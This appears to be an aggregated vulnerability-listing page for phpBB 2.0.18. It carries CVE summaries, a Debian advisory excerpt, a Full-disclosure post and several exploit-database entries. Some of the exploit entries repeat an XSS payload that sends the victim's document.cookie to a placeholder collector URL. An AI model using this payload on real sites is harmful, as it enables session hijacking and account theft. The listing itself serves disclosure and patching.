CVE-2005-3536
CVE-2005-3536: SQL injection in phpBB 2 prior to 2.0.18 via the topic type. Multiple connected advisories (Debian DSA-925-1, OpenVAS entries) confirm the vulnerability and suggest patching phpBB2 packages; remediation involves upgrading to the fixed phpBB version per the advisories. The affected...
[SECURITY] [DSA 925-1] New phpbb2 packages fix several vulnerabilities
-------------------------------------------------------------------------- Debian Security Advisory DSA 925-1 [email protected] http://www.debian.org/security/ Martin Schulze December 22nd, 2005 http://www.debian.org/security/faq -...
DSA-925-1 phpbb2 - several
Bulletin has no description...
phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit
Exploit for unknown platform in category web applications ==================================================== phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0;...
phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure
/ phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...
phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit
No description provided by source. / phpBB = 2.0.18 XSS Cookie Disclosure Proof of Concept -- 'the html is on exploit' original exploit by: cXIb8O3 - 12/16/2005 proof of concept by: jet -- http://jet.carbon-4.net/ develop a pure, lucid mind, not depending upon sound, flavor, touch, odor, or any...
phpBB 2.0.18 - Cross-Site Scripting Cookie Disclosure
phpBB 2.0.18 - Cross-Site Scripting Cookie Disclosure / phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...
CVE-2005-4357
Cross-site scripting (XSS) vulnerability in phpBB 2.0.18, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary JavaScript via a permitted HTML tag with " quote characters and active attributes such as onmouseover...
CVE-2005-4358
admin/admin_disallow.php in phpBB 2.0.18 allows remote attackers to obtain the installation path via a direct request with a non-empty setmodules parameter, which causes an invalid append_sid function call that leaks the path in an error message...
CVE-2005-4358
CVE-2005-4358 affects phpBB 2.0.18. The vulnerability is in admin/admin_disallow.php where a direct request with a non-empty setmodules parameter leads to an invalid append_sid function call that leaks the installation path in an error message. Impact: remote attackers can obtain the path to the ...
CVE-2005-4357
CVE-2005-4357 is a cross-site scripting (XSS) vulnerability in phpBB when the “Allowed HTML tags” feature is enabled. The issue allows remote attackers to inject arbitrary JavaScript via a permitted HTML tag that includes characters like " and active attributes such as onmouseover, effectively ex...
CVE-2005-4346
Invalid SQL syntax error in blog.php in phpBB Blog 2.2.2 and earlier allows remote attackers to obtain the full path of the application via an invalid permalink parameter to index.php, which produces an invalid SQL query that leaks the full pathname in a SQL syntax error message. NOTE: this was...
CVE-2005-4346
phpBB Blog 2.2.2 and earlier: A function in blog.php causes an invalid SQL query when the permalink parameter to index.php is cleansed to empty (non-digit chars stripped), leading to a SQL syntax error that leaks the full application pathname. This is not a true SQL injection in practice, but the...
[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure
phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22 Author: Maksymilian Arciemowicz cXIb8O3 Date: 16.12.2005 from securityreason.com TEAM --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin...